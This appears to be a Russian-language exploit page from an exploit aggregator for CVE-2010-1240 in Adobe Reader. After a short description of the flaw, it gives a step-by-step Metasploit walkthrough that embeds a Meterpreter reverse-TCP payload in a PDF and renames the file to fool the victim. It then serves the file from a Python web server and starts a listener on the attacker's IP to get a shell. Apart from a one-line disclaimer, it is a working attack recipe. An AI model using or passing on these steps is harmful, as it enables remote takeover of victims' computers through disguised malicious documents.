## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ASEPSAEPDIN-CVE-2010-1240
# CVE-2010-1240 - Внедрение бэкдора в PDF
  
* * *
⚠️ _Только для образовательных и авторизованных исследовательских целей в области безопасности_
## Описание
Adobe Reader и Acrobat 9.x до 9.3.3, а также 8.x до 8.2.3 в Windows и Mac OS X не ограничивают содержимое одного текстового поля в диалоговом окне предупреждения Launch File, что облегчает удаленным злоумышленникам обманом заставить пользователей выполнить произвольную локальную программу, указанную в PDF-документе, как показано на примере текстового поля, утверждающего, что кнопка Open позволит пользователю прочитать зашифрованное сообщение.
## Демонстрация

## Пошаговые инструкции
1. Сначала запустите msfconsole
root@kitploit:~
msfconsole
2. Затем установите полезную нагрузку для внедрения в PDF
root@kitploit:~
use exploit/windows/fileformat/adobe_pdf_embedded_exe
3. Установите параметр INFILENAME и укажите прямой путь к исходному PDF-файлу
root@kitploit:~
set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
4. Задайте имя новому вредоносному PDF-файлу, чтобы оно выглядело убедительнее, установив параметр FILENAME
root@kitploit:~
set FILENAME laporan.pdf
5. Найдите и внедрите полезную нагрузку в PDF-файл
root@kitploit:~
set payload windows/meterpreter/reverse_tcp
6. Установите параметр LHOST на IP-адрес атакующего
root@kitploit:~
set LHOST 172.16.10.10
7. Откройте новый терминал и перейдите в папку с вредоносным PDF-файлом
root@kitploit:~
cd .msf4/local/
8. Создайте временный сервер на Python
root@kitploit:~
python -m http.server
9. Загрузите вредоносный PDF-файл на машину жертвы
root@kitploit:~
http://172.16.10.10:8000/certificate.pdf
10. Перед запуском вредоносного PDF-файла на машине жертвы запустите слушатель в предыдущем терминале
root@kitploit:~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.10.10
exploit
11. Как только вредоносный PDF-файл будет выполнен на машине жертвы, вы получите подключение к машине жертвы
## Благодарности
* https://nvd.nist.gov/vuln/detail/CVE-2010-1240
* https://medium.com/purple-team/embedding-backdoor-into-pdf-files-1781dfce62b1
* https://github.com/Jasmoon99/Embedded-PDF